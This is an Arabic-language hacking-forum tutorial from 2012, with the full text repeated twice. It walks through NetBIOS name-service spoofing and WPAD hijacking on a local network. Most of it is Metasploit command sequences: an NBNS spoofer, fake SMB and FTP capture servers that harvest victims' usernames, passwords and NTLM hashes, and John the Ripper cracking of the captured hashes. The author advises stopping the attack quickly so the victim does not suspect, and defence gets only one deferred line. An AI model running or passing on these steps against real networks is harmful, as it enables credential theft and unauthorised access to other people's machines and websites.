rss
06-23-2012, 12:21 AM
بسم اللة الرحمن الرحيم السلام عليكم اعضاء منتدى الديف بونيت
لمقدمة : سوف نتكلم اليوم على هذا النوع من الهجوم
- شرح عن NetBios بتفصيل اوامرة طريقة عملة
- هجوم NetBIOS Name Registration
- هجوم NetBIOS Name Resolution وامثلة وانواعة
- هجوم Broadcast NetBIOS Name Resolution وما دخلة في البيانات الصادرة والواردة
- هجوم NetBios Name Service Spoofing في الشبكات
- Web Proxy Auto-Discovery Hijacking
- استعمال الميتاسبلوت في مثل هذا الهجوم
- طريقة الحماية منة
اولا نعرف عن NetBIOS ولما يستعمل هو اختصار ل Network Basic Input/output System\
والذي يمكن لاجهزة مختلفة في الشبكة (LAN ) ب الاتصال بينهم ب بروتوكول اتصالات وهناك انواع كثيرة
منها NPS واختصارها NBT NetBIOS over IPX/SPX
ولاكن اليوم في اغلب الانضمة المتحضرة تعمل على "NetBIOS over TCP/IP"
ثانيا ل NetBIOS عدة وظائف واهمها :
* Name service واسست لتكوين البيانات الثابتة بشبكة وايجادها عن طريق البورت 137\UDP
* يسمح بتسجيل اسم NetBIOS في الشبكة
* يسمح بمسح NetBIOS عن الشبكة
* يسمح ب التقاط حزم بينات والطريقة معروفة ب اسم NetBIOS Name Resolution
Session service\Datagram distribution service اعدو لعمل الاتصال بين الاجهزة وعن
طريق البورت 139 \TCP
* SESSION امكانية الاتصال عن بعد بجهاز
* تواجد استعلام في انضمة الوندوز عن طريق الاداه Nbtstat الموجودة في ال NetBIOS وممكن استعمالها بشكل التالي:
Nbtstat –a IP_Address
مثال على عنوان الايبي 10.0.0.1 قد تلقينا :
http://img651.imageshack.us/img651/2355/98344827.png (http://imageshack.us/photo/my-images/651/98344827.png/)
طبعا هذه معلومات سهلة لن اشرحها تضم نوع الخدمة \ الايبي \اسم الاجهزة\عنوان الماك ادريس
NetBIOS Name Registration
Nbtstat -n
نشوف الصورة :
http://img820.imageshack.us/img820/4014/63740247.png (http://imageshack.us/photo/my-images/820/63740247.png/)
NetBIOS Name Resolution
وهذا النوع من الهجوم نستعمل الامر
\\ComputerName\Share
طبعا لن اتعمق في مثل هذه المواضبع لانها كبيرة وتاخد وقت سوف اختصر العملية دي لاستخراج اسماء الاجهزة المشاركة
لو قرات المقدمة عن ال NetBIOS لا تياس فسوف تهم لان الموضوع يتبع الاخر تابع......
Broadcast NetBIOS Name Resolution
محاولة جمع المعلومات والحزم استعملت برنامج Wireshark لفلترة الحين ننفذ الامر
nbtstat -a DigitalWhisper
والذي يعمل تحت البورت udp.port == 137 نستطيع رؤية الحزم التي تم ارسالها الى 10.0.0.255
في حال لم نتلقى اجابة سيضر Host not found. عنجها نعلم انة لا يتواجد DigitalWhisper (اسم الجهاز)
نشوف صورة الفلترة
http://img826.imageshack.us/img826/1349/97837555.png (http://imageshack.us/photo/my-images/826/97837555.png/)
مثال اسم جهازي ARYA-PC
ننفذ الامر : nbtstat -a ARYA-PC
http://img812.imageshack.us/img812/500/95809181.png (http://imageshack.us/photo/my-images/812/95809181.png/)
NetBios Name Service Spoofing
تم استغلال مثل هذا الهجوم عن طريق الميتا وشرح بتفصيل هنا
http://ipositivesecurity.blogspot.co...ilary-ftw.html (http://ipositivesecurity.blogspot.co.il/2011/04/****************sploit-nbns-auxilary-ftw.html)
كود الثغرة من الموقع
http://dev.****************sploit.co...ns_response.rb (http://dev.****************sploit.com/redmine/projects/framework/repository/entry/modules/auxiliary/spoof/nbns/nbns_response.rb)
Web Proxy Auto-Discovery Hijacking
بعد تنفيذ Spoofing عل الشبكة HTTP تحديدا شوف الصورة
http://img571.imageshack.us/img571/7671/50321336.png (http://imageshack.us/photo/my-images/571/50321336.png/)
عن طريق الامر GET /wpad.dat HTTP/1.1
في حال وجود WPAD نستطيع ارسال طلب GET للملف المسمى wpad.dat
الاسغلال ب M.e.t.a.s.p.l.o.i.t
ويكون عن طريق الامر nbns_respons
msf > use auxiliary/spoof/nbns/nbns_response
http://img59.imageshack.us/img59/7581/63891734.png[/URL
نشوف الاستعمال ب امر show options
msf auxiliarynbns_response) > show options
[URL=http://imageshack.us/photo/my-images/69/57147246.png/]http://img69.imageshack.us/img69/6431/57147246.png[/URL
* INTERFACE عنوان الشبكة التي نريد التنصت عبيها
* REGEX استعمال NetBIOS Name غير جهازنا
* Resolution كل الطلبات المستقبلة
* SPOOFIP رقم الايبي المستهدف
مثال كيف بعد ما املئتة :
msf auxiliray(nbns_response) > set INTERFACE eth0
INTERFACE => eth0
msf auxiliray(nbns_response) > set SPOOFIP 10.0.0.6
SPOOFIP => 10.0.0.6
شغل ب الامر run
msf auxiliray(nbns_response) > run
Auxiliary mmodule execution completed
NBNS Spoofer started. Listening for NBNS requests
لحين نعمل تنصت
تشغيل الامر
msf > use auxiliary/server/capture/smb
[URL=http://imageshack.us/photo/my-images/443/12810061.png/]http://img443.imageshack.us/img443/7738/12810061.png[/URL
بعد هذة العملية نعبي المعلومات بشكل التالي
msf auxiliray(smb) > set JOHNPWFILE /tmp/pwds
JOHNPWFILE => /tmp/pwds
msf auxiliray(smb) > run
Auxiliary mmodule execution completed
Server started.
تى نرى انو يشتغل ننفذ الامر jobs
راح يضهر بجهاز الضحية صورة لادخال اليوزر والباس
[URL=http://imageshack.us/photo/my-images/705/61495160.png/]http://img705.imageshack.us/img705/9219/61495160.png[/URL
بمجرد ادخالهم احنا بدورنا نستقبل كما بصورة
[URL=http://imageshack.us/photo/my-images/32/64994598.png/]http://img32.imageshack.us/img32/4957/64994598.png[/URL
والان نوقف عملية nbns_response ب استخدام الامر jobs
msf auxiliary(smb) > jobs Jobs Id Name ---- --
0 Auxiliary: spoof/nbns/nbns_response 1 Auxiliary: server/capture/smb msf auxiliary(smb) > jobs -k 0 Stopping job: 0...
[URL=http://imageshack.us/photo/my-images/84/51883521.png/]http://img84.imageshack.us/img84/6683/51883521.png[/URL
الان وشفنا التشفير الاكواد LM Hash و NTLM Hash
نشغل الملف عن طريق الامر
root@root:~# cd /pentest/passwords/john root@root:/pentest/passwords/john# john /tmp/pwds_netlmv2
[URL=http://imageshack.us/photo/my-images/207/69447346.png/]http://img207.imageshack.us/img207/9660/69447346.png[/URL
اذا كانت كلمة السر سهلة ستضهر بسرعة الحين عنا اكثر من طريقة ل الاختراق
الان تقوم بتشغيل nbns_response
وبعدها ننفذ الامر
msf > use auxiliary/server/capture/ftp
[URL=http://imageshack.us/photo/my-images/19/22068514.png/]http://img19.imageshack.us/img19/5676/22068514.png[/URL
SRVHOST + الايبي + ف تي بي للي نريد ان ندخل الية
msf auxiliary(ftp) > set SRVHOST 10.0.0.4 SRVHOST => 10.0.0.4
ونشغل run
msf auxiliary(ftp) > run
Auxiliary mmodule execution completed
Server started.
[URL=http://imageshack.us/photo/my-images/3/12111903.png/]http://img3.imageshack.us/img3/6164/12111903.png[/URL
راح يضهر بضحية مثل الصورة
[URL=http://imageshack.us/photo/my-images/19/30811291./]http://img19.imageshack.us/img19/2174/30811291.png[/URL
وفي جهازي :
[URL=http://imageshack.us/photo/my-images/42/53880897.png/]http://img42.imageshack.us/img42/2289/53880897.png[/URL
بعد ادخال المعلومات
[URL="http://imageshack.us/photo/my-images/94/31269814.png/"]http://img94.imageshack.us/img94/5675/31269814.png (http://imageshack.us/photo/my-images/59/63891734.png/)
نوقف العملية بضغط على ctrl+c حتى لا يشك
شرحي هذا عن الاف تي بي لاصحاب المواقع وما اكثرهم وليس فقط الاجهزة :8:
الحماية من الهجوم
ندخل على الملفات التالية
ال hosts و lmhosts ويجب التعديل عليهم وسوف اشرح بموضوع افرادي
الى هنا اكون قد انتهيت
استحلفكم باللة لا تنقلو الموضوع دون ذكر الكاتب
الموضوع لنقاش فتفضلو باسالتكم والسلام عبيكم
لمقدمة : سوف نتكلم اليوم على هذا النوع من الهجوم
- شرح عن NetBios بتفصيل اوامرة طريقة عملة
- هجوم NetBIOS Name Registration
- هجوم NetBIOS Name Resolution وامثلة وانواعة
- هجوم Broadcast NetBIOS Name Resolution وما دخلة في البيانات الصادرة والواردة
- هجوم NetBios Name Service Spoofing في الشبكات
- Web Proxy Auto-Discovery Hijacking
- استعمال الميتاسبلوت في مثل هذا الهجوم
- طريقة الحماية منة
اولا نعرف عن NetBIOS ولما يستعمل هو اختصار ل Network Basic Input/output System\
والذي يمكن لاجهزة مختلفة في الشبكة (LAN ) ب الاتصال بينهم ب بروتوكول اتصالات وهناك انواع كثيرة
منها NPS واختصارها NBT NetBIOS over IPX/SPX
ولاكن اليوم في اغلب الانضمة المتحضرة تعمل على "NetBIOS over TCP/IP"
ثانيا ل NetBIOS عدة وظائف واهمها :
* Name service واسست لتكوين البيانات الثابتة بشبكة وايجادها عن طريق البورت 137\UDP
* يسمح بتسجيل اسم NetBIOS في الشبكة
* يسمح بمسح NetBIOS عن الشبكة
* يسمح ب التقاط حزم بينات والطريقة معروفة ب اسم NetBIOS Name Resolution
Session service\Datagram distribution service اعدو لعمل الاتصال بين الاجهزة وعن
طريق البورت 139 \TCP
* SESSION امكانية الاتصال عن بعد بجهاز
* تواجد استعلام في انضمة الوندوز عن طريق الاداه Nbtstat الموجودة في ال NetBIOS وممكن استعمالها بشكل التالي:
Nbtstat –a IP_Address
مثال على عنوان الايبي 10.0.0.1 قد تلقينا :
http://img651.imageshack.us/img651/2355/98344827.png (http://imageshack.us/photo/my-images/651/98344827.png/)
طبعا هذه معلومات سهلة لن اشرحها تضم نوع الخدمة \ الايبي \اسم الاجهزة\عنوان الماك ادريس
NetBIOS Name Registration
Nbtstat -n
نشوف الصورة :
http://img820.imageshack.us/img820/4014/63740247.png (http://imageshack.us/photo/my-images/820/63740247.png/)
NetBIOS Name Resolution
وهذا النوع من الهجوم نستعمل الامر
\\ComputerName\Share
طبعا لن اتعمق في مثل هذه المواضبع لانها كبيرة وتاخد وقت سوف اختصر العملية دي لاستخراج اسماء الاجهزة المشاركة
لو قرات المقدمة عن ال NetBIOS لا تياس فسوف تهم لان الموضوع يتبع الاخر تابع......
Broadcast NetBIOS Name Resolution
محاولة جمع المعلومات والحزم استعملت برنامج Wireshark لفلترة الحين ننفذ الامر
nbtstat -a DigitalWhisper
والذي يعمل تحت البورت udp.port == 137 نستطيع رؤية الحزم التي تم ارسالها الى 10.0.0.255
في حال لم نتلقى اجابة سيضر Host not found. عنجها نعلم انة لا يتواجد DigitalWhisper (اسم الجهاز)
نشوف صورة الفلترة
http://img826.imageshack.us/img826/1349/97837555.png (http://imageshack.us/photo/my-images/826/97837555.png/)
مثال اسم جهازي ARYA-PC
ننفذ الامر : nbtstat -a ARYA-PC
http://img812.imageshack.us/img812/500/95809181.png (http://imageshack.us/photo/my-images/812/95809181.png/)
NetBios Name Service Spoofing
تم استغلال مثل هذا الهجوم عن طريق الميتا وشرح بتفصيل هنا
http://ipositivesecurity.blogspot.co...ilary-ftw.html (http://ipositivesecurity.blogspot.co.il/2011/04/****************sploit-nbns-auxilary-ftw.html)
كود الثغرة من الموقع
http://dev.****************sploit.co...ns_response.rb (http://dev.****************sploit.com/redmine/projects/framework/repository/entry/modules/auxiliary/spoof/nbns/nbns_response.rb)
Web Proxy Auto-Discovery Hijacking
بعد تنفيذ Spoofing عل الشبكة HTTP تحديدا شوف الصورة
http://img571.imageshack.us/img571/7671/50321336.png (http://imageshack.us/photo/my-images/571/50321336.png/)
عن طريق الامر GET /wpad.dat HTTP/1.1
في حال وجود WPAD نستطيع ارسال طلب GET للملف المسمى wpad.dat
الاسغلال ب M.e.t.a.s.p.l.o.i.t
ويكون عن طريق الامر nbns_respons
msf > use auxiliary/spoof/nbns/nbns_response
http://img59.imageshack.us/img59/7581/63891734.png[/URL
نشوف الاستعمال ب امر show options
msf auxiliarynbns_response) > show options
[URL=http://imageshack.us/photo/my-images/69/57147246.png/]http://img69.imageshack.us/img69/6431/57147246.png[/URL
* INTERFACE عنوان الشبكة التي نريد التنصت عبيها
* REGEX استعمال NetBIOS Name غير جهازنا
* Resolution كل الطلبات المستقبلة
* SPOOFIP رقم الايبي المستهدف
مثال كيف بعد ما املئتة :
msf auxiliray(nbns_response) > set INTERFACE eth0
INTERFACE => eth0
msf auxiliray(nbns_response) > set SPOOFIP 10.0.0.6
SPOOFIP => 10.0.0.6
شغل ب الامر run
msf auxiliray(nbns_response) > run
Auxiliary mmodule execution completed
NBNS Spoofer started. Listening for NBNS requests
لحين نعمل تنصت
تشغيل الامر
msf > use auxiliary/server/capture/smb
[URL=http://imageshack.us/photo/my-images/443/12810061.png/]http://img443.imageshack.us/img443/7738/12810061.png[/URL
بعد هذة العملية نعبي المعلومات بشكل التالي
msf auxiliray(smb) > set JOHNPWFILE /tmp/pwds
JOHNPWFILE => /tmp/pwds
msf auxiliray(smb) > run
Auxiliary mmodule execution completed
Server started.
تى نرى انو يشتغل ننفذ الامر jobs
راح يضهر بجهاز الضحية صورة لادخال اليوزر والباس
[URL=http://imageshack.us/photo/my-images/705/61495160.png/]http://img705.imageshack.us/img705/9219/61495160.png[/URL
بمجرد ادخالهم احنا بدورنا نستقبل كما بصورة
[URL=http://imageshack.us/photo/my-images/32/64994598.png/]http://img32.imageshack.us/img32/4957/64994598.png[/URL
والان نوقف عملية nbns_response ب استخدام الامر jobs
msf auxiliary(smb) > jobs Jobs Id Name ---- --
0 Auxiliary: spoof/nbns/nbns_response 1 Auxiliary: server/capture/smb msf auxiliary(smb) > jobs -k 0 Stopping job: 0...
[URL=http://imageshack.us/photo/my-images/84/51883521.png/]http://img84.imageshack.us/img84/6683/51883521.png[/URL
الان وشفنا التشفير الاكواد LM Hash و NTLM Hash
نشغل الملف عن طريق الامر
root@root:~# cd /pentest/passwords/john root@root:/pentest/passwords/john# john /tmp/pwds_netlmv2
[URL=http://imageshack.us/photo/my-images/207/69447346.png/]http://img207.imageshack.us/img207/9660/69447346.png[/URL
اذا كانت كلمة السر سهلة ستضهر بسرعة الحين عنا اكثر من طريقة ل الاختراق
الان تقوم بتشغيل nbns_response
وبعدها ننفذ الامر
msf > use auxiliary/server/capture/ftp
[URL=http://imageshack.us/photo/my-images/19/22068514.png/]http://img19.imageshack.us/img19/5676/22068514.png[/URL
SRVHOST + الايبي + ف تي بي للي نريد ان ندخل الية
msf auxiliary(ftp) > set SRVHOST 10.0.0.4 SRVHOST => 10.0.0.4
ونشغل run
msf auxiliary(ftp) > run
Auxiliary mmodule execution completed
Server started.
[URL=http://imageshack.us/photo/my-images/3/12111903.png/]http://img3.imageshack.us/img3/6164/12111903.png[/URL
راح يضهر بضحية مثل الصورة
[URL=http://imageshack.us/photo/my-images/19/30811291./]http://img19.imageshack.us/img19/2174/30811291.png[/URL
وفي جهازي :
[URL=http://imageshack.us/photo/my-images/42/53880897.png/]http://img42.imageshack.us/img42/2289/53880897.png[/URL
بعد ادخال المعلومات
[URL="http://imageshack.us/photo/my-images/94/31269814.png/"]http://img94.imageshack.us/img94/5675/31269814.png (http://imageshack.us/photo/my-images/59/63891734.png/)
نوقف العملية بضغط على ctrl+c حتى لا يشك
شرحي هذا عن الاف تي بي لاصحاب المواقع وما اكثرهم وليس فقط الاجهزة :8:
الحماية من الهجوم
ندخل على الملفات التالية
ال hosts و lmhosts ويجب التعديل عليهم وسوف اشرح بموضوع افرادي
الى هنا اكون قد انتهيت
استحلفكم باللة لا تنقلو الموضوع دون ذكر الكاتب
الموضوع لنقاش فتفضلو باسالتكم والسلام عبيكم